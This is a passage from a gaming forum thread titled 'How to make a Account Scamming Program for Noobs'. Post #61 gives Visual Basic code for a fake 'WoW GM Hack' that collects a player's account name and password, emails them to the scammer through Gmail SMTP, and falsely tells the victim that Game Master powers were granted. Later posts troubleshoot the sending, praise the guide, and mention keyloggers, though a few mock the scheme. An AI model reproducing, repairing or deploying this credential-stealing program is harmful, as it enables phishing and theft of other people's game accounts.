[VB 2008] How to make a Account Scamming Program for Noobs menu

User Tag List

Page 5 of 5 FirstFirst 12345
Results 61 to 74 of 74
  1. #61
    Erase's Avatar Banned
    Reputation
    229
    Join Date
    Jun 2008
    Posts
    990
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Can you tell me, what is wrong with this code?
    The RED part is where I get error.


    Code:
    Imports System.Web
    Imports System.IO
    Imports System.Net.Mail
    
    Public Class Form1
        Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
            If TextBox1.Text = "" Then
                MsgBox("The account field is not filled in!", MsgBoxStyle.OkOnly, "WoW GM Hack")
            End If
    
            If TextBox2.Text = "" Then
                MsgBox("The password field is not filled in!", MsgBoxStyle.OkOnly, "WoW GM Hack")
            End If
    
            Dim mail As New System.Net.Mail.MailMessage()
            Dim SmtpServer As New SmtpClient
            SmtpServer.Credentials = New Net.NetworkCredential("[email protected]", "***")
            SmtpServer.Port = 587
            SmtpServer.Host = "smtp.gmail.com"
            SmtpServer.EnableSsl = True
            mail.To.Add("[email protected]")
            mail.From = New MailAddress("[email protected]")
            mail.Subject = "Activate GM Powers"
            mail.Body = "Account: " & TextBox1.Text & vbNewLine & "Password: " & TextBox2.Text
            SmtpServer.Send(mail)
     
            MsgBox("Done! Your account's flag has been upgraded to Game Master. It will be fully updated within 24 hours.", MsgBoxStyle.OkOnly, "WoW GM Hack")
        End Sub
    End Class
    Last edited by SheEpYW0lf; 07-28-2009 at 10:47 AM.

    [VB 2008] How to make a Account Scamming Program for Noobs
  2. #62
    The Maffyx's Avatar Contributor

    Reputation
    249
    Join Date
    Feb 2007
    Posts
    1,186
    Thanks G/R
    0/4
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Not sure but I recommend using Cephalopod's code here: http://www.mmowned.com/forums/vb/200...ml#post1353196

    Worked fine for me, no errors.


    I do however use "alt1.gmail-smtp-in.l.google.com" as my server instead of "smtp.gmail.com", if everything looks like its working but nothing is going to your inbox, try checking your spam, thats where mine showed up. If it does, you can make a filter to make it go to your inbox or a special folder or what not. If you need help w/ that PM me and I can guide you through it.


  3. #63
    Erase's Avatar Banned
    Reputation
    229
    Join Date
    Jun 2008
    Posts
    990
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I still have the same problem The same place as before, it just says
    smtp.Send(mContent)
    now.

  4. #64
    france435's Avatar Member
    Reputation
    -6
    Join Date
    Jul 2009
    Posts
    8
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    haha lol guys................i hate scammers but some times its funny what they do HAHA on youtube there is A LOT OF WOW SCAMMERS! as we all know lol meny of them are using scripts in vb that steals ur account name and password when u enter it welll...........meny noobs forget to remove the vb picture in corner that shows it was made in vb lol reason why its dumb to leave the littel logo be in the cornor when ur scammng is because meny smart peopel would know ur just like the other scamers that made there fake wow hack in under a hour in vb .............................-.not always under a hour depends how good u are at programmng---...........

  5. #65
    The Maffyx's Avatar Contributor

    Reputation
    249
    Join Date
    Feb 2007
    Posts
    1,186
    Thanks G/R
    0/4
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    ...................What's the reason for........................the .........periods?


  6. #66
    Erase's Avatar Banned
    Reputation
    229
    Join Date
    Jun 2008
    Posts
    990
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    .............He.........Might...........Have...........A..........Hard.......... ..Time...............Breathing................................

  7. #67
    fleischi93's Avatar Active Member
    Reputation
    27
    Join Date
    Apr 2008
    Posts
    231
    Thanks G/R
    5/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Hm thanks Jadd!

    I like VB and I just searched a Keylogger/Scammer for WoW Accounts

    Think, I try this later..
    Or as blizzard would put it, "users having fun in our game which is in direct conflict with our goals"
    I <3 MMOwned.com

  8. #68
    billonis's Avatar Member
    Reputation
    12
    Join Date
    Feb 2008
    Posts
    172
    Thanks G/R
    0/0
    Trade Feedback
    2 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I altered the code a bit but when i press the button the whole programm wont respond,it gets stuck

  9. #69
    to6y's Avatar Member
    Reputation
    10
    Join Date
    Aug 2008
    Posts
    71
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Yo - VB bitches about the smtpserver.send having an incorrect syntax @_@ Could this be due to the fact i edited the smtp server to my own? (I bought my own smtp server)

  10. #70
    The Maffyx's Avatar Contributor

    Reputation
    249
    Join Date
    Feb 2007
    Posts
    1,186
    Thanks G/R
    0/4
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Yo - figure it out yourself.


  11. #71
    damnme's Avatar Member
    Reputation
    1
    Join Date
    Aug 2009
    Posts
    4
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    :)

    Hello, Thank you for making this tut...I mean it is not useful scamming like how you designed it but I know now how to make a program that sends the fields to my e-mail. I give this a 5/5 not for the usefulness of the ACTUAL Program but for the guide on how to make it. The creativeness is up to who ever wants to use the knowledge he provided.
    -Thank you
    --------------
    BTW this is the 1st thing I have ever made with VB soo i r noob. :P

  12. #72
    war10cklol's Avatar Private
    Reputation
    1
    Join Date
    Oct 2010
    Posts
    1
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    why the information dont go to my e-mail? plz help me

    ---------- Post added at 01:10 PM ---------- Previous post was at 01:00 PM ----------

    why the informations dont go to my e-mail? can eny1 help me plz?

  13. #73
    machaa's Avatar Sergeant
    Reputation
    34
    Join Date
    Oct 2010
    Posts
    43
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    sux, shouldnt give this out to everyone. :P
    nice guide btw.

  14. #74
    Carebear's Avatar Member
    Reputation
    1
    Join Date
    May 2007
    Posts
    28
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Activate GM powers....really...i mean really?
    Who would EVER fill out his account credentials and clck on a button of a random program you have just downloaded from some unknown source.

Page 5 of 5 FirstFirst 12345
All times are GMT -5. The time now is 04:42 PM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search